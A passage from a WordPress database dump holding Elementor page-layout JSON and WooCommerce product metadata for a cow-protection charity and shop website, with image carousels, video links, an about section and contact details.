/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10529,1754,'_elementor_page_assets','a:0:{}'),(10532,1755,'_edit_lock','1665733069:1'),(10533,1755,'_edit_last','1'),(10534,1755,'_thumbnail_id','1692'),(10535,1755,'_donable','yes'),(10536,1755,'wcdp-settings[0]','0'),(10537,1755,'wcdp-settings[1]',''),(10538,1755,'wcdp-settings[wcdp_fundraising_goal]','0'),(10539,1755,'wcdp-settings[wcdp_fundraising_end_date]',''),(10540,1755,'total_sales','0'),(10541,1755,'_tax_status','taxable'),(10542,1755,'_tax_class',''),(10543,1755,'_manage_stock','no'),(10544,1755,'_backorders','no'),(10545,1755,'_sold_individually','no'),(10546,1755,'_virtual','no'),(10547,1755,'_downloadable','no'),(10548,1755,'_download_limit','-1'),(10549,1755,'_download_expiry','-1'),(10550,1755,'_stock',NULL),(10551,1755,'_stock_status','instock'),(10552,1755,'_wc_average_rating','0'),(10553,1755,'_wc_review_count','0'),(10554,1755,'_product_version','7.0.0'),(10555,1755,'_ywpo_preorder','no'),(10556,1755,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:2:\"90\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(10557,1756,'_edit_lock','1665726503:1'),(10558,1756,'_edit_last','1'),(10559,1755,'wcdp_total_revenue','a:2:{s:7:\"revenue\";d:0;s:4:\"time\";i:1665726683;}'),(10560,1755,'_wcfm_product_views','191'),(10561,1755,'_regular_price','32000'),(10562,1755,'_price','32000'),(10572,1759,'_elementor_edit_mode','builder'),(10573,1759,'_elementor_template_type','wp-page'),(10574,1759,'_elementor_version','3.7.8'),(10575,1759,'_wp_page_template','elementor_canvas'),(10576,1759,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\